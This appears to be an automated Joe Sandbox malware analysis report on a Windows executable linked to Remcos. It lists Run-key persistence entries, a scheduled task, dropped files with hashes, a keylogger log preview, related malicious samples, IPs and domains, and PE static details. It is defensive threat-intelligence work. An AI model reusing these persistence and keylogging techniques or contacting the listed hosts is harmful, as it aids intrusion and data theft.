Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: pPLwX9wSrD.exe

Simulations

Behavior and APIs

Time	Type	Description
17:39:30	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OrionLegacyCLI C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exe
17:39:38	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OrionLegacyCLI C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exe
17:39:43	Task Scheduler	Run new task: dzocgvabs path: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe
17:40:11	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run HardDiskSentinea C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exe
17:40:19	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run HardDiskSentinea C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
181.131.217.244	sXpIsdpkzy.exe	Get hash	malicious	Remcos	Browse
	hCJ8gK9kNn.exe	Get hash	malicious	Remcos	Browse
	x4fDy1muYs.exe	Get hash	malicious	Unknown	Browse
	VwiELrqQjD.exe	Get hash	malicious	Remcos	Browse
	ozfqy8Ms6t.exe	Get hash	malicious	Unknown	Browse
	3XSXmrEOw7.exe	Get hash	malicious	Unknown	Browse
	s0tuvMen1D.exe	Get hash	malicious	AsyncRAT, DcRat	Browse
	hCJ8gK9kNn.exe	Get hash	malicious	Unknown	Browse
	SYSnyI8qDu.exe	Get hash	malicious	Remcos	Browse
178.237.33.50	sXpIsdpkzy.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	VwiELrqQjD.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	SYSnyI8qDu.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	Reqt 83291.vbs	Get hash	malicious	Remcos, GuLoader	Browse	geoplugin.net/json.gp
	DOCUMENT#5885588@081366(766.pdf.exe	Get hash	malicious	GuLoader, Remcos	Browse	geoplugin.net/json.gp
	1733845413a1d8742853c308d6ac4d050f80c4b91bf14f4919c2728222ecef14ce82d51adb973.dat-decoded.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	RFQ 008191.exe	Get hash	malicious	Remcos, GuLoader	Browse	geoplugin.net/json.gp
	PO-8776-2024.js	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	order CF08093-24.exe	Get hash	malicious	Remcos, GuLoader	Browse	geoplugin.net/json.gp
	matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	geoplugin.net/json.gp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
navegacionseguracol24vip.org	hCJ8gK9kNn.exe	Get hash	malicious	Remcos	Browse	181.131.217.244
	ozfqy8Ms6t.exe	Get hash	malicious	Unknown	Browse	181.131.217.244
	3XSXmrEOw7.exe	Get hash	malicious	Unknown	Browse	181.131.217.244
	hCJ8gK9kNn.exe	Get hash	malicious	Unknown	Browse	181.131.217.244
bitbucket.org	hCJ8gK9kNn.exe	Get hash	malicious	Remcos	Browse	185.166.143.49
	x4fDy1muYs.exe	Get hash	malicious	Unknown	Browse	185.166.143.48
	ozfqy8Ms6t.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	3XSXmrEOw7.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	hCJ8gK9kNn.exe	Get hash	malicious	Unknown	Browse	185.166.143.49
	https://feji.us/m266he	Get hash	malicious	Unknown	Browse	185.166.143.50
	lLNOwu1HG4.js	Get hash	malicious	RHADAMANTHYS	Browse	185.166.143.50
	iVH355vnza.vbs	Get hash	malicious	Unknown	Browse	185.166.143.50
	9QwZPBACyK.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
geoplugin.net	sXpIsdpkzy.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	VwiELrqQjD.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	SYSnyI8qDu.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Reqt 83291.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	DOCUMENT#5885588@081366(766.pdf.exe	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	1733845413a1d8742853c308d6ac4d050f80c4b91bf14f4919c2728222ecef14ce82d51adb973.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	RFQ 008191.exe	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	PO-8776-2024.js	Get hash	malicious	Remcos	Browse	178.237.33.50
	order CF08093-24.exe	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	178.237.33.50
s3-w.us-east-1.amazonaws.com	hCJ8gK9kNn.exe	Get hash	malicious	Remcos	Browse	3.5.25.23
	ozfqy8Ms6t.exe	Get hash	malicious	Unknown	Browse	3.5.29.178
	3XSXmrEOw7.exe	Get hash	malicious	Unknown	Browse	3.5.28.146
	financial_policy_December 10, 2024.pdf	Get hash	malicious	KnowBe4, PDFPhish	Browse	54.231.205.1
	https://login.hr-internal.co/27553be9ed867726?l=50	Get hash	malicious	Unknown	Browse	3.5.28.204
	http://prntbl.concejomunicipaldechinu.gov.co	Get hash	malicious	Unknown	Browse	16.15.193.78
	https://github.com/Matty77o/malware-samples-m-h/blob/main/TheTrueFriend.exe	Get hash	malicious	Unknown	Browse	54.231.165.145
	https://auth.ball.com	Get hash	malicious	Unknown	Browse	16.182.101.169
	https://businessnotice.org/dhl/22450156620/tracking?u=84775-c0bf6be57168918ea5fe039631be6c3a772f4fac11292328fca4a210ba0e8890	Get hash	malicious	Unknown	Browse	52.217.98.132
	https://quiet-sun-5d9f.atmos4.workers.dev/login	Get hash	malicious	Unknown	Browse	3.5.23.166

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
EPMTelecomunicacionesSAESPCO	sXpIsdpkzy.exe	Get hash	malicious	Remcos	Browse	181.131.217.244
	hCJ8gK9kNn.exe	Get hash	malicious	Remcos	Browse	181.131.217.244
	x4fDy1muYs.exe	Get hash	malicious	Unknown	Browse	181.131.217.244
	VwiELrqQjD.exe	Get hash	malicious	Remcos	Browse	181.131.217.244
	ozfqy8Ms6t.exe	Get hash	malicious	Unknown	Browse	181.131.217.244
	3XSXmrEOw7.exe	Get hash	malicious	Unknown	Browse	181.131.217.244
	s0tuvMen1D.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	181.131.217.244
	hCJ8gK9kNn.exe	Get hash	malicious	Unknown	Browse	181.131.217.244
	SYSnyI8qDu.exe	Get hash	malicious	Remcos	Browse	181.131.217.244
AMAZON-02US	hCJ8gK9kNn.exe	Get hash	malicious	Remcos	Browse	185.166.143.49
	x4fDy1muYs.exe	Get hash	malicious	Unknown	Browse	185.166.143.48
	ozfqy8Ms6t.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	3XSXmrEOw7.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	hCJ8gK9kNn.exe	Get hash	malicious	Unknown	Browse	185.166.143.49
	file.exe	Get hash	malicious	Vidar	Browse	18.238.49.124
	file.exe	Get hash	malicious	Invicta Stealer, XWorm	Browse	45.112.123.126
	jew.arm.elf	Get hash	malicious	Unknown	Browse	52.30.223.81
	7299_output.vbs	Get hash	malicious	Unknown	Browse	3.78.28.71
ATOM86-ASATOM86NL	sXpIsdpkzy.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	VwiELrqQjD.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	SYSnyI8qDu.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Reqt 83291.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	DOCUMENT#5885588@081366(766.pdf.exe	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	1733845413a1d8742853c308d6ac4d050f80c4b91bf14f4919c2728222ecef14ce82d51adb973.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	RFQ 008191.exe	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	PO-8776-2024.js	Get hash	malicious	Remcos	Browse	178.237.33.50
	order CF08093-24.exe	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	178.237.33.50
AMAZON-02US	hCJ8gK9kNn.exe	Get hash	malicious	Remcos	Browse	185.166.143.49
	x4fDy1muYs.exe	Get hash	malicious	Unknown	Browse	185.166.143.48
	ozfqy8Ms6t.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	3XSXmrEOw7.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	hCJ8gK9kNn.exe	Get hash	malicious	Unknown	Browse	185.166.143.49
	file.exe	Get hash	malicious	Vidar	Browse	18.238.49.124
	file.exe	Get hash	malicious	Invicta Stealer, XWorm	Browse	45.112.123.126
	jew.arm.elf	Get hash	malicious	Unknown	Browse	52.30.223.81
	7299_output.vbs	Get hash	malicious	Unknown	Browse	3.78.28.71

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	hCJ8gK9kNn.exe	Get hash	malicious	Remcos	Browse	185.166.143.50 54.231.193.17
	x4fDy1muYs.exe	Get hash	malicious	Unknown	Browse	185.166.143.50 54.231.193.17
	ozfqy8Ms6t.exe	Get hash	malicious	Unknown	Browse	185.166.143.50 54.231.193.17
	3XSXmrEOw7.exe	Get hash	malicious	Unknown	Browse	185.166.143.50 54.231.193.17
	hCJ8gK9kNn.exe	Get hash	malicious	Unknown	Browse	185.166.143.50 54.231.193.17
	NOTIFICACIONES+FISCALES+Y+DEMANDAS+PENDIENTES.pdf.pdf	Get hash	malicious	Unknown	Browse	185.166.143.50 54.231.193.17
	file.exe	Get hash	malicious	Invicta Stealer, XWorm	Browse	185.166.143.50 54.231.193.17
	http://duckduckgogg42xjoc72x3sjasowoarfbgcmvfimaftt6twagswzczad.onion	Get hash	malicious	Unknown	Browse	185.166.143.50 54.231.193.17
	questionable.ps1	Get hash	malicious	Unknown	Browse	185.166.143.50 54.231.193.17

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exe	hCJ8gK9kNn.exe	Get hash	malicious	Remcos	Browse
C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exe	hCJ8gK9kNn.exe	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	hCJ8gK9kNn.exe	Get hash	malicious	Remcos	Browse
C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exe	hCJ8gK9kNn.exe	Get hash	malicious	Remcos	Browse

Created / dropped Files

C:\ProgramData\fdgfghgfhg\logs.dat

Process:	C:\Users\user\AppData\Local\Temp\dzocgvabs.exe
File Type:	data
Category:	dropped
Size (bytes):	488
Entropy (8bit):	3.2533689208459093
Encrypted:	false
SSDEEP:	12:6laqlhecmlaIbWFe5UlakclaRbWFe5UlaHlaebW+:6NScmzWqUQSWqUoVW+
MD5:	1AD1E2C9453E1D42E81000398A570D87
SHA1:	FB3688B9D1296687BC501244BAE9621ABB6E299B
SHA-256:	C3B7CA12117FB4EC1D7B10EC5810C5DCF0A459664EFB0ADD9A57AEB9FAC677BB
SHA-512:	7DC0A53899F3B9A5C94EAC24090AB20E9848EC6139B82399E15AC84539A32130C10CEE68CF831F2255A3A3EA50B50244C46B0C474F66B2384E65EF0040AF2EE8
Malicious:	false
Reputation:	low
Preview:	....[.2.0.2.4./.1.2./.1.2. .1.1.:.4.0.:.0.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.1.2./.1.2. .1.1.:.4.0.:.0.6. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.1.2./.1.2. .1.1.:.4.0.:.1.1. .R.u.n.].........[.2.0.2.4./.1.2./.1.2. .1.1.:.4.0.:.1.6. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.1.2./.1.2. .1.1.:.4.0.:.1.9. .R.u.n.].........[.2.0.2.4./.1.2./.1.2. .1.1.:.4.0.:.2.2. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\json[1].json

Process:	C:\Users\user\AppData\Local\Temp\dzocgvabs.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	963
Entropy (8bit):	5.018384957371898
Encrypted:	false
SSDEEP:	12:tkluWJmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zz2:qlupdRNuKyGX85jvXhNlT3/7CcVKWro
MD5:	C9BB4D5FD5C8A01D20EBF8334B62AE54
SHA1:	D38895F4CBB44CB10B6512A19034F14A2FC40359
SHA-256:	767218EC255B7E851971A77B773C0ECC59DC0B179ECA46ABCC29047EEE6216AA
SHA-512:	2D412433053610C0229FB3B73A26C8FB684F0A4AB03A53D0533FDC52D4E9882C25037015ACE7D4A411214AA9FAA780A8D950A83B57B200A877E26D7890977157
Malicious:	false
Reputation:	low
Preview:	{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

C:\Users\user\AppData\Local\Temp\dzocgvabs.exe

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4054528
Entropy (8bit):	6.41931526899004
Encrypted:	false
SSDEEP:	98304:swsFCTOMRebywOIYAXu14+MFL3MrI+rtZg+VRWKldQwsRwRHa0eQkxHodWYPWIRL:Psukx/cRAVyoqjU9sVK+
MD5:	27650AFE28BA588C759ADE95BF403833
SHA1:	6D3D03096CEE42FC07300FB0946EC878161DF8A5
SHA-256:	CA84EC6D70351B003D3CACB9F81BE030CC9DE7AC267CCE718173D4F42CBA2966
SHA-512:	767CEB499DDA76E63F9ECEAA2AA2940D377E70A2F1B8E74DE72126977C96B32E151BFF1FB88A3199167E16977B641583F8E8EA0F764A35214F6BC9A2D2814FDC
Malicious:	true
Joe Sandbox View:	Filename: hCJ8gK9kNn.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................. .........H. .......!...@...........................[..................@...........................p=.n5....?.p.....................................................=.....................................................CODE......!....... ................. ..`DATA..........!....... .............@...BSS...........!.......!..................idata...@...p=..6....!.............@....tls..........=.......!..................rdata... ....=.......!.............@..P.rsrc...p.....?.......!.............@..P........................................................................................................................................................................................................................

C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exe

Process:	C:\Users\user\AppData\Local\Temp\dzocgvabs.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	979567142
Entropy (8bit):	0.05590638890163692
Encrypted:	false
SSDEEP:
MD5:	599A413EE85CC3A8A223C83230DC8D54
SHA1:	5D6E856794B3AF1D96AB0319350856BD5BCE4BE6
SHA-256:	CAAB3F404A2CE6D4EFCBFEC97172CBC17D2E4A8D128F4BB42BBE677947DBB425
SHA-512:	6EF58AC644BE1B60F2E65851CEF60E81D772212CB9B127613DDB77A941B555868AD3B616B173574D2129AC5F874650D485E520AE62287C939B5581C9E6D0CC32
Malicious:	false
Joe Sandbox View:	Filename: hCJ8gK9kNn.exe, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................. .........H. .......!...@...........................[..................@...........................p=.n5....?.p.....................................................=.....................................................CODE......!....... ................. ..`DATA..........!....... .............@...BSS...........!.......!..................idata...@...p=..6....!.............@....tls..........=.......!..................rdata... ....=.......!.............@..P.rsrc...p.....?.......!.............@..P........................................................................................................................................................................................................................

C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exe

Process:	C:\Users\user\Desktop\pPLwX9wSrD.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	979567344
Entropy (8bit):	0.04446253531927003
Encrypted:	false
SSDEEP:
MD5:	BFE1D6A6FB7A4B19F7B32D9FA6F529B4
SHA1:	D03151ABB594C66390E0EEEA2E512E8D97E9B36E
SHA-256:	3B616C5242CCB77FFD37EBE1E229C38D69BA52B5AA3AD244A5A251D88A6169FD
SHA-512:	C66ED6F768A02028CDC149D104052B544E9B12A14A19DE48EC76D8412D43FA8B3F7BF01F5B50E1BB8DDAE69844C40603AA194C87E3773780443162EF78D3E402
Malicious:	false
Joe Sandbox View:	Filename: hCJ8gK9kNn.exe, Detection: malicious, Browse Filename: hCJ8gK9kNn.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........UR..;...;...;.K.d...;.2."...;...f...;.F.4...;.F.d.q.;.......;...[...;._."...;.K.f...;...:...;.F.[.D.;.F.g...;.$.e...;.F.a...;.Rich..;.................PE..L...xz.V......................#......0............@...........................0......................................&..........@.........!.........................0...................................@...............$.......@....................text...U........................... ..`.rdata..{...........................@..@.data........0...$..................@....rsrc.....!.......!..@..............@..@........................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	2.523990419172251
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	pPLwX9wSrD.exe
File size:	10'485'760 bytes
MD5:	1492e1506afedad20933ae244cf658d1
SHA1:	db68cd234205c628ebf3a8329246baf3cdc10ead
SHA256:	8ee7bb70506574eb0ba1bffc0bafd993c707d01e54385ca83fb3f731521a9298
SHA512:	9fe92f173fa8cb453eeb4bb40abf78164638d15fe6ffcc8aaf8c2f73e22f02b2256d26f50f73fa5f5ef246cdf0d3e3df32576372b20e8fb7ef61d73792ffa80e
SSDEEP:	49152:S9BlUVJsBsiK9d3MC+qX+EF+Zx6bwMKexczvm4:S9BlEsWl9d3MChfzbwMKemO4
TLSH:	4DB6AE22B6C0C147EAD25070D296E7F1A1683E39E7412987B3C07E9FB276EC1593B527
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........UR..;...;...;.K.d...;.2."...;...f...;.F.4...;.F.d.q.;.......;...[...;._."...;.K.f...;...:...;.F.[.D.;.F.g...;.$.e...;.F.a...;

File Icon


Icon Hash:	f1a58babada68603

Static PE Info

General

Entrypoint:	0x4830cf
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x56A87A78 [Wed Jan 27 08:06:16 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e52615253ba93e77e88da2201bcab98a

Entrypoint Preview

Instruction
push 00000060h
push 004D5458h
call 00007FC360D9EED6h
mov edi, 00000094h
mov eax, edi
call 00007FC360D99D6Eh
mov dword ptr [ebp-18h], esp
mov esi, esp
mov dword ptr [esi], edi
push esi
call dword ptr [004C14E8h]
mov ecx, dword ptr [esi+10h]
mov dword ptr [004ED0FCh], ecx
mov eax, dword ptr [esi+04h]
mov dword ptr [004ED108h], eax
mov edx, dword ptr [esi+08h]
mov dword ptr [004ED10Ch], edx
mov esi, dword ptr [esi+0Ch]
and esi, 00007FFFh
mov dword ptr [004ED100h], esi
cmp ecx, 02h
je 00007FC360D9D88Eh
or esi, 00008000h
mov dword ptr [004ED100h], esi
shl eax, 08h
add eax, edx
mov dword ptr [004ED104h], eax
xor esi, esi
push esi
mov edi, dword ptr [004C1488h]
call 00007FC360D6D85Ch
dec ebp
pop edx
jne 00007FC360D9D8A1h
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
cmp dword ptr [ecx], 00004550h
jne 00007FC360D9D894h
movzx eax, word ptr [ecx+18h]
cmp eax, 0000010Bh
je 00007FC360D9D8A1h
cmp eax, 0000020Bh
je 00007FC360D9D887h
mov dword ptr [ebp-1Ch], esi
jmp 00007FC360D9D8A9h
cmp dword ptr [ecx+00000084h], 0Eh
jbe 00007FC360D9D874h
xor eax, eax
cmp dword ptr [ecx+000000F8h], esi
jmp 00007FC360D9D890h
cmp dword ptr [ecx+74h], 0Eh
jbe 00007FC360D9D864h
xor eax, eax
cmp dword ptr [ecx+000000E8h], esi
setne al
mov dword ptr [ebp-1Ch], eax

Rich Headers

Programming Language:

[ASM] VS2003 (.NET) SP1 build 6030
[ C ] VS2003 (.NET) SP1 build 6030
[C++] VS2003 (.NET) build 3077
[C++] VS2003 (.NET) SP1 build 6030
[EXP] VS2003 (.NET) SP1 build 6030
[RES] VS2003 (.NET) build 3077
[LNK] VS2003 (.NET) SP1 build 6030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xe26f0	0x18b	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xdf4b0	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xef000	0x219a18	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0xc1a30	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xd9a90	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xc1000	0xa24	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0xdf400	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xbfd55	0xbfe00	a86b6c827e5e7e0cf5fc9c41a25e4dea	False	0.4546582349348534	data	6.349271524607046	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xc1000	0x2187b	0x21a00	9e4eab11d2823d639daa51b6b83eccfb	False	0.3397784038104089	data	5.912662755924659	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xe3000	0xbb14	0x2400	65699f99584db3dd9db5aacc00e8c82d	False	0.3504774305555556	data	4.5108554971453305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xef000	0x219a18	0x219c00	14aa7097ae14d9835016ab88acd68716	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0xefdd0	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	Korean	North Korea	0.4805194805194805
RT_CURSOR	0xefdd0	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	Korean	South Korea	0.4805194805194805
RT_CURSOR	0xeff04	0xb4	Targa image data - Map 32 x 65536 x 1 +16 "\001"	Korean	North Korea	0.7
RT_CURSOR	0xeff04	0xb4	Targa image data - Map 32 x 65536 x 1 +16 "\001"	Korean	South Korea	0.7
RT_CURSOR	0xeffb8	0x134	AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd	Korean	North Korea	0.36363636363636365
RT_CURSOR	0xeffb8	0x134	AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd	Korean	South Korea	0.36363636363636365
RT_CURSOR	0xf00ec	0x134	Targa image data - RLE 64 x 65536 x 1 +32 "\001"	Korean	North Korea	0.35714285714285715
RT_CURSOR	0xf00ec	0x134	Targa image data - RLE 64 x 65536 x 1 +32 "\001"	Korean	South Korea	0.35714285714285715
RT_CURSOR	0xf0220	0x134	data	Korean	North Korea	0.37337662337662336
RT_CURSOR	0xf0220	0x134	data	Korean	South Korea	0.37337662337662336
RT_CURSOR	0xf0354	0x134	data	Korean	North Korea	0.37662337662337664
RT_CURSOR	0xf0354	0x134	data	Korean	South Korea	0.37662337662337664
RT_CURSOR	0xf0488	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	Korean	North Korea	0.36688311688311687
RT_CURSOR	0xf0488	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	Korean	South Korea	0.36688311688311687
RT_CURSOR	0xf05bc	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	Korean	North Korea	0.37662337662337664
RT_CURSOR	0xf05bc	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	Korean	South Korea	0.37662337662337664
RT_CURSOR	0xf06f0	0x134	Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"	Korean	North Korea	0.36688311688311687
RT_CURSOR	0xf06f0	0x134	Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"	Korean	South Korea	0.36688311688311687
RT_CURSOR	0xf0824	0x134	Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"	Korean	North Korea	0.38636363636363635
RT_CURSOR	0xf0824	0x134	Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"	Korean	South Korea	0.38636363636363635
RT_CURSOR	0xf0958	0x134	data	Korean	North Korea	0.44155844155844154
RT_CURSOR	0xf0958	0x134	data	Korean	South Korea	0.44155844155844154
RT_CURSOR	0xf0a8c	0x134	data	Korean	North Korea	0.4155844155844156
RT_CURSOR	0xf0a8c	0x134	data	Korean	South Korea	0.4155844155844156
RT_CURSOR	0xf0bc0	0x134	AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd	Korean	North Korea	0.5422077922077922
RT_CURSOR	0xf0bc0	0x134	AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd	Korean	South Korea	0.5422077922077922
RT_CURSOR	0xf0cf4	0x134	data	Korean	North Korea	0.2662337662337662
RT_CURSOR	0xf0cf4	0x134	data	Korean	South Korea	0.2662337662337662
RT_CURSOR	0xf0e28	0x134	data	Korean	North Korea	0.2824675324675325
RT_CURSOR	0xf0e28	0x134	data	Korean	South Korea	0.2824675324675325
RT_CURSOR	0xf0f5c	0x134	data	Korean	North Korea	0.3246753246753247
RT_CURSOR	0xf0f5c	0x134	data	Korean	South Korea	0.3246753246753247
RT_BITMAP	0xf1090	0x1d4e8	Device independent bitmap graphic, 200 x 200 x 24, image size 120000, resolution 3780 x 3780 px/m			0.631939353548817
RT_BITMAP	0x10e578	0xb8	Device independent bitmap graphic, 12 x 10 x 4, image size 80	Korean	North Korea	0.44565217391304346
